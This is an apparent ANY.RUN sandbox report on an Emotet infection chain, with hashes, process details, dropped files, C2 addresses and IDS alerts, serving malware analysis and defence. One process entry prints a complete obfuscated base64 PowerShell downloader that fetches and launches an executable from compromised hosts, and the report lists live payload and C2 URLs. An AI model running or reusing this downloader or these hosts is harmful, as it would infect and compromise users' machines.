analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://diamondbreeze.com/wp-content/docs/ig220w-64348062-050708-0o2ix-nk0skuh0

Full analysis: https://app.any.run/tasks/c0778281-fbad-4113-97dd-08b15a85e8f4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 19:11:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
opendir
loader
trojan
Indicators:
MD5:

0B2F7E3F2EDF2E3129420BF59EC76A96

SHA1:

B75847A8EBA60B378639FD6B945E22D3694221CC

SHA256:

A2FE722940D1A6030EDD5F3AACB22D1C4DE30EB99046A085464266BADFBC0C6E

SSDEEP:

3:N1KaME311otSVOlAQ8BXUVGXHmNcK:CaFvVOlAhUVAGCK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • iexplore.exe (PID: 2508)
      • WINWORD.EXE (PID: 776)
    • Application was dropped or rewritten from another process

      • 47.exe (PID: 896)
      • 47.exe (PID: 3308)
      • serialfunc.exe (PID: 3980)
      • serialfunc.exe (PID: 564)
      • serialfunc.exe (PID: 3248)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3836)
    • Emotet process was detected

      • 47.exe (PID: 3308)
    • EMOTET was detected

      • serialfunc.exe (PID: 564)
    • Connects to CnC server

      • serialfunc.exe (PID: 564)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 564)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • iexplore.exe (PID: 1752)
      • WINWORD.EXE (PID: 776)
    • Application launched itself

      • WINWORD.EXE (PID: 776)
      • serialfunc.exe (PID: 3980)
      • serialfunc.exe (PID: 564)
    • Executed via WMI

      • powershell.exe (PID: 3836)
    • Creates files in the user directory

      • powershell.exe (PID: 3836)
    • PowerShell script executed

      • powershell.exe (PID: 3836)
    • Executable content was dropped or overwritten

      • 47.exe (PID: 3308)
      • powershell.exe (PID: 3836)
    • Starts itself from another location

      • 47.exe (PID: 3308)
    • Connects to server without host name

      • serialfunc.exe (PID: 564)
    • Connects to unusual port

      • serialfunc.exe (PID: 564)
  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 2508)
      • WINWORD.EXE (PID: 776)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2508)
    • Application launched itself

      • iexplore.exe (PID: 1752)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2508)
    • Changes internet zones settings

      • iexplore.exe (PID: 1752)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1324)
      • WINWORD.EXE (PID: 776)
      • serialfunc.exe (PID: 3248)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
10
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe 47.exe no specs #EMOTET 47.exe serialfunc.exe no specs #EMOTET serialfunc.exe serialfunc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1752"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2508"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1752 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
776"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\5FMBH9U9\DOC_S7ROCA2XPV[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1324"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3836powershell -w hidden -en JABYAGgAZABlAGQAYQBiAHoAbgB1AGEAYQA9ACcAVwB4AGcAaQBiAHcAYwBuAHgAdwAnADsAJABLAHkAcgB1AGIAdQBxAGsAbgB0ACAAPQAgACcANAA3ACcAOwAkAEoAYgByAGYAaABuAGwAcwBnAGcAbAByAD0AJwBZAHYAcQB4AHIAeQBzAHkAdABkAGYAJwA7ACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAeQByAHUAYgB1AHEAawBuAHQAKwAnAC4AZQB4AGUAJwA7ACQATwBrAGsAaABkAG8AZgByAHkAdgA9ACcATQBrAHEAcQBxAHUAcQBuAGoAZQBzAGcAJwA7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAD0AJgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagBlAGMAdAAnACkAIABOAGUAVAAuAFcAZQBiAEMATABpAEUATgB0ADsAJABVAHAAeQB4AG0AdgBmAHMAcABuAGIAdQA9ACcAaAB0AHQAcAA6AC8ALwByAG0AYwBlAG4AdAByAGUALgBiAGkAZwBmAGkAbABtAHAAcgBvAGQAdQBjAHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEwAcgBPAHEAaAAvACoAaAB0AHQAcAA6AC8ALwBsAGUAYwBhAGQAZQBhAHUAZwBvAHUAcgBtAGEAbgBkAC4AZgByAC8ANAA3AG0AbgAwADQALwBvAFMAOABEAGsAVgAvACoAaAB0AHQAcAA6AC8ALwBkAGEAdABuAGUAbgB0AGEAeQBoAGEAbgBvAGkALgBpAG4AZgBvAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcAB5AFoAcgBkAGQAZwAvACoAaAB0AHQAcAA6AC8ALwBiAGkAZQB0AHQAaAB1AHYAaQBuAGgAbwBtAGUAcwBnAGkAYQBsAGEAbQAuAHgAeQB6AC8AYwBnAGkALQBiAGkAbgAvAGEAYwBCADQAcQA0AHkALwAqAGgAdAB0AHAAOgAvAC8AYwBsAGkAYwBrAGIAYQBuAGsAYgByAGUAYQBrAHMAdABoAGUAaQBuAHQAZQByAG4AZQB0AC4AYwBvAG0ALwBvAEEANgBlAG4ASQA4AC8AJwAuACIAUwBwAGAATABJAHQAIgAoACcAKgAnACkAOwAkAFEAYwBsAGkAbwBhAHAAZQB3AGkAPQAnAEkAZABoAHYAYQB6AGEAZQBmAG4AYgBoAGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEsAaAB3AGQAbwBsAGEAdwBoAHUAcwBqAHYAIABpAG4AIAAkAFUAcAB5AHgAbQB2AGYAcwBwAG4AYgB1ACkAewB0AHIAeQB7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAC4AIgBEAG8AYAB3AG4AYABsAE8AYABBAEQAZgBpAEwARQAiACgAJABLAGgAdwBkAG8AbABhAHcAaAB1AHMAagB2ACwAIAAkAEIAcwBhAHQAYwBxAG4AagBwAHYAbgBvACkAOwAkAEUAegBrAHIAZABpAHQAeABkAGcAcQA9ACcARQBoAG8AaQB1AHMAbQBuAGYAbgBkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADQANwAxADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAHQAIgAoACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQA7ACQARQBkAGEAZABmAGYAbABrAGYAbABxAHMAPQAnAEYAZQBwAGoAcgBsAHoAeAB5AHQAbQAnADsAYgByAGUAYQBrADsAJABCAHkAbABnAHkAeABuAHAAdABjAGMAbABjAD0AJwBDAGQAcgBjAGMAeABoAGIAeQB1AGIAdQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAGgAcgB1AGoAagBtAHQAZQA9ACcAQwB6AGwAYwBuAHkAcABoAGYAdQB2AGIAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
896"C:\Users\admin\47.exe" C:\Users\admin\47.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3308--c57b844dC:\Users\admin\47.exe
47.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3980"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe47.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
564--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Version:
1, 0, 0, 1
3248"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" "C:\Users\admin\AppData\Local\Temp\CE0F.tmp"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exeserialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Total events
3 646
Read events
2 699
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
6
Text files
10
Unknown types
15

Dropped files

PID
Process
Filename
Type
1752iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
1752iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
1752iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFDDCDA737DA0111A0.TMP
MD5:
SHA256:
776WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE5F5.tmp.cvr
MD5:
SHA256:
776WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_DB91D98F-CA20-4E97-808A-B75A75B6AC3A.0\CBDBD918.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
1324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_DB91D98F-CA20-4E97-808A-B75A75B6AC3A.0\42774526.wmf
MD5:
SHA256:
1324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_DB91D98F-CA20-4E97-808A-B75A75B6AC3A.0\A651A6EF.wmf
MD5:
SHA256:
1324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_DB91D98F-CA20-4E97-808A-B75A75B6AC3A.0\47FFB424.wmf
MD5:
SHA256:
1324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_DB91D98F-CA20-4E97-808A-B75A75B6AC3A.0\21467DD5.wmf
MD5:
SHA256:
1324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_DB91D98F-CA20-4E97-808A-B75A75B6AC3A.0\108441D2.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
11
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2508
iexplore.exe
GET
301
160.153.16.7:80
http://diamondbreeze.com/wp-content/docs/ig220w-64348062-050708-0o2ix-nk0skuh0
US
html
287 b
unknown
564
serialfunc.exe
POST
37.157.195.120:7080
http://37.157.195.120:7080/stNP4WA7ID
CZ
malicious
564
serialfunc.exe
POST
162.241.92.219:8080
http://162.241.92.219:8080/fuYjxPorpDehdZdYlpx
US
malicious
564
serialfunc.exe
POST
162.241.92.219:8080
http://162.241.92.219:8080/VBGSlTqV4yP
US
malicious
564
serialfunc.exe
POST
162.241.92.219:8080
http://162.241.92.219:8080/fuYjxPorpDehdZdYlpx
US
malicious
1752
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2508
iexplore.exe
GET
200
160.153.16.7:80
http://diamondbreeze.com/wp-content/docs/ig220w-64348062-050708-0o2ix-nk0skuh0/
US
document
123 Kb
unknown
564
serialfunc.exe
POST
200
37.157.195.120:7080
http://37.157.195.120:7080/UXstcmUk
CZ
binary
148 b
malicious
564
serialfunc.exe
POST
200
37.157.195.120:7080
http://37.157.195.120:7080/UXstcmUk
CZ
binary
148 b
malicious
564
serialfunc.exe
POST
200
107.2.2.28:80
http://107.2.2.28/8DMgtH
US
binary
1.54 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1752
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3836
powershell.exe
206.221.182.74:80
rmcentre.bigfilmproduction.com
Choopa, LLC
US
malicious
564
serialfunc.exe
162.241.92.219:8080
CyrusOne LLC
US
malicious
2508
iexplore.exe
160.153.16.7:80
diamondbreeze.com
GoDaddy.com, LLC
US
unknown
564
serialfunc.exe
107.2.2.28:80
Comcast Cable Communications, LLC
US
malicious
564
serialfunc.exe
192.241.131.79:8080
Digital Ocean, Inc.
US
malicious
564
serialfunc.exe
37.157.195.120:7080
WEDOS Internet, a.s.
CZ
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
diamondbreeze.com
  • 160.153.16.7
unknown
rmcentre.bigfilmproduction.com
  • 206.221.182.74
malicious

Threats

PID
Process
Class
Message
3836
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3836
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3836
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
564
serialfunc.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 2
564
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
564
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
564
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
564
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
564
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
564
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
No debug info